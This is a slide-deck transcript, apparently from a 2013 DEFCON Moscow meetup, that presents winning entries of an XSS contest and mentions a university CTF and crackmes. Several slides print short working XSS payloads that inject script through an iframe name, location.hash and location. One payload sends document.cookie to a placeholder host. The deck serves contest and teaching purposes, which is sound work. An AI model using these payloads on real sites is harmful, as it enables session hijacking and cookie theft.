Top Banner
Contests and more Nov 23, 2013
8

4.5. Contests [extras]

Aug 07, 2015

Download

Internet

defconmoscow
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Page 1: 4.5. Contests [extras]

Contests and more

Nov 23, 2013

Page 2: 4.5. Contests [extras]

2

XSS Contest

Contests and more

<script> eval('a='+); </script>

Page 3: 4.5. Contests [extras]

3

XSS Contest

Trolling is a art: 4 symbols

Омар Ганиев

BETEPOK

data:text/html,<iframe name="1;alert(1);//any code" src="http://www.defcon-moscow.org/secret/contest.php?payload=name">

<iframe name="1;new Image().src='//site/x.gif?'+document.cookie;" src="http://www.defcon-moscow.org/secret/contest.php?payload=name"></iframe>

Contests and more

Page 4: 4.5. Contests [extras]

4

XSS Contest

location.hash: 18 symbols

payload='"'+location.hash#"; alert(document.cookie);

Contests and more

Page 5: 4.5. Contests [extras]

5

XSS Contest

location: 13 symbols

contest.php?*/alert(document.cookie)//&payload='/*'+location

Contests and more

Page 6: 4.5. Contests [extras]

6

Extraz

BMSTU CTF

http://www.defcon-moscow.org/CTF

Contests and more

Page 7: 4.5. Contests [extras]

7

Extraz

Reverse: crackmes

Contests and more

Page 8: 4.5. Contests [extras]

8

Extraz

TBD:– web– crypto– exploitation– . . .

[email protected]

Contests and more